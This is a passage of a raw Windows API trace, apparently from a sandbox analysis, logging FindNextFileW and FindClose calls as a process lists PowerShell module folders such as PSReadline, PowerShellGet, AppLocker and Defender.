hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0265.498] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.498] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.499] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.499] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.499] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0265.500] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0265.500] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.501] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.501] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.502] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.502] FindNextFileW (in: hFindFile=0x1a8dbbc0, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0265.502] FindClose (in: hFindFile=0x1a8dbbc0 | out: hFindFile=0x1a8dbbc0) returned 1 [0265.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e140) returned 1 [0265.503] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.503] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.503] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81dee0 | out: lpFindFileData=0x1b81dee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.504] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0265.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e140) returned 1 [0265.504] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81df40 | out: lpFindFileData=0x1b81df40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.505] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81df40 | out: lpFindFileData=0x1b81df40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.505] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81df40 | out: lpFindFileData=0x1b81df40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0265.505] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e1a0) returned 1 [0265.506] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.506] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.507] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.507] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0265.508] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0265.508] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0265.508] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e330) returned 1 [0265.509] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.509] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0265.510] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.510] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.511] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.512] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0265.512] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0265.512] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0265.512] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0265.513] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e3f0 | out: lpFindFileData=0x1b81e3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.513] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0265.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e650) returned 1 [0265.514] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.514] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0265.514] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0265.515] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0265.531] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0265.531] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0265.532] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0265.532] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0265.532] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0265.533] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0265.533] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0265.534] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0265.536] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0265.537] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: 